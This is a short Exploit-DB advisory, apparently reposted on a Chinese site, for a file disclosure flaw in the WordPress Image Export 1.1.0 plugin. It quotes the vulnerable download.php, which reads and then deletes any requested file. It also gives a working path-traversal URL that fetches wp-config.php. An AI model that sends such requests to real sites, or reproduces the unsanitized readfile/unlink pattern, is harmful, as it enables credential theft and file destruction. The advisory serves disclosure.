WordPress Plugin Image Export 1.1.0 – Arbitrary File Disclosure

  • 作者: AMAR^SHG
    日期: 2016-03-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39584/
  • # Exploit Title: WordPress image-export LFD
    # Date: 03/21/2016
    # Exploit Author: AMAR^SHG
    # Vendor Homepage: http://www.1efthander.com
    # Software Link:
    http://www.1efthander.com/category/wordpress-plugins/image-export
    # Version: Everything is affected including latest (1.1.0 )
    # Tested on: Windows/Unix on localhost
    
    download.php file code:
    
    <?php
    if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
    	$file = $_GET['file'];
    
    	header( 'Content-Type: application/zip' );
    	header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    	readfile( $file );
    	unlink( $file );
    	
    	exit;
    }
    ?>
    
    Proof of concept:
    
    Note that because of the unlink, we potentially can destroy the wordpress core.
    
    Simply add the get parameter file:
    
    localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
    
    Found by AMAR^SHG (Shkupi Hackers Group)